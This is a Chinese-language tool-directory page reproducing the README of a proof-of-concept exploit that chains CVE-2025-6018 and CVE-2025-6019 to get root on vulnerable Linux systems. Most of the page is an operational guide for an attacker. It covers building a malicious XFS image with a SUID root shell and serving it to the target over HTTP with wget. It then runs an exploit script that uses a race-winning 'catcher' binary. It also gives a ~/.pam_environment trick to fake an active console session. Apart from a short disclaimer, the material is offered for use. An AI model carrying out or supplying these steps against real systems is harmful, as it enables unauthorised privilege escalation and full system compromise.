Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6018-6019-PoC — 一个概念验证(PoC),用于链式利用 CVE-2025-6018(PAM/Polkit 活动会话绕过)和 CVE-2025-6019(libblockdev SUID 挂载缺陷),在易受攻击的 Linux 系统上实现本地权限提升(LPE)。 | Kitploit
工具/GitHubGitHub/michaelventurella/cve-2025-6018-6019-poc
权限提升漏洞分析漏洞利用渗透测试学习与教育实验室与实践
GitHubmichaelventurella/cve-2025-6018-6019-poc

CVE-2025-6018-6019-PoC

一个概念验证(PoC),用于链式利用 CVE-2025-6018(PAM/Polkit 活动会话绕过)和 CVE-2025-6019(libblockdev SUID 挂载缺陷),在易受攻击的 Linux 系统上实现本地权限提升(LPE)。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1727个月前尚未审核

CVE-2025-6018 和 CVE-2025-6019:本地权限提升 PoC

一个强大的概念验证(PoC),用于串联 CVE-2025-6018(PAM/Polkit Active 会话绕过)和 CVE-2025-6019(libblockdev SUID 挂载漏洞),在易受攻击的 Linux 系统上获取 root 访问权限。

免责声明

本工具仅用于教育目的和经过授权的安全研究。请勿在您不拥有或未经明确许可测试的系统上使用。


漏洞链

此漏洞利用串联两个逻辑缺陷,将权限从普通用户提升到 root:

  1. CVE-2025-6018(入口): PAM/Polkit 中的配置错误允许远程 SSH 会话被标记为 Active=yes。此技巧使系统认为远程用户在控制台前物理在场,从而绕过 udisks2 等硬件管理工具的密码要求。
  2. CVE-2025-6019(武器): libblockdev 库(由 udisks2 使用)在临时挂载文件系统以执行维护操作(如 Check 或 Resize)时未能应用 nosuid 安全标志。

攻击链条

  1. 准备: 我们创建一个包含静态 SUID root shell 的恶意 XFS 镜像。
  2. 绕过: 我们利用 Active=yes 会话状态,无需密码即将此镜像挂载为 loop 设备。
  3. 触发: 我们向 Filesystem.Check 发起 D-Bus 调用。这会迫使 udisks2 临时挂载该镜像以进行验证。关键的是,该临时挂载缺少 nosuid。
  4. 竞态条件: 一个编译好的 C 程序(“The Sniper”)实时监控 /proc/mounts。临时挂载一出现,它就在系统卸载之前执行 SUID 载荷。

使用方法

阶段一:准备(攻击者机器)

由于目标机器通常缺少 mkfs.xfs 或 gcc 等工具,我们在本地生成载荷。

  1. 在 Kali/Parrot 上运行构建脚本:

    root@kitploit:~
    ./build_poc.sh
    
    • 创建 exploit.img(包含 SUID shell 的 400MB XFS 镜像)。
    • 编译 catcher(竞态条件胜出者)。
  2. 将文件上传到目标: 启动 Python 服务器:

    root@kitploit:~
    python3 -m http.server 80
    

    在目标机器上(例如在 /tmp 中):

    root@kitploit:~
    wget http://<YOUR_IP>/exploit.img
    wget http://<YOUR_IP>/catcher
    chmod +x catcher
    

阶段二:利用(目标机器)

  1. 下载漏洞利用脚本: 将此仓库中的 exploit.sh 内容保存到目标机器。

  2. 运行漏洞利用:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  3. 获得 Root: 该脚本将自动设置 loop 设备、启动后台 catcher,并触发漏洞。您应立即获得 root shell。


故障排除

“需要身份验证才能设置 loop 设备”

如果脚本要求输入密码,说明您的 SSH 会话不处于活动状态。 修复方法:

  1. 创建 ~/.pam_environment:
    root@kitploit:~
    echo "XDG_SEAT=seat0" > ~/.pam_environment
    echo "XDG_VTNR=1" >> ~/.pam_environment
    
  2. 注销并重新登录。
  3. 使用 loginctl show-session $XDG_SESSION_ID | grep Active 进行验证。必须显示 Active=yes。

“竞态条件失败 / 无 shell”

漏洞窗口仅有几毫秒宽。

  • 确保您使用的是编译后的 C catcher(包含在 build_poc.sh 中),而不是 Bash 循环。
  • 该脚本使用 Filesystem.Check 方法,这比 Resize 更可靠。

文件清单

build_poc.sh(攻击者端)

自动创建恶意镜像并编译静态二进制文件。

exploit.sh(目标端)

编排脚本。它负责:

  1. 检查 Active 会话。
  2. 在后台启动 catcher。
  3. 通过 udisksctl 设置 loop 设备。
  4. 触发 D-Bus Filesystem.Check 调用。

致谢

  • 原始发现: Qualys 研究团队(CVE-2025-6018、CVE-2025-6019)https://www.helpnetsecurity.com/2025/06/18/chaining-two-lpes-to-get-root-most-linux-distros-vulnerable-cve-2025-6018-cve-2025-6019/
下载工具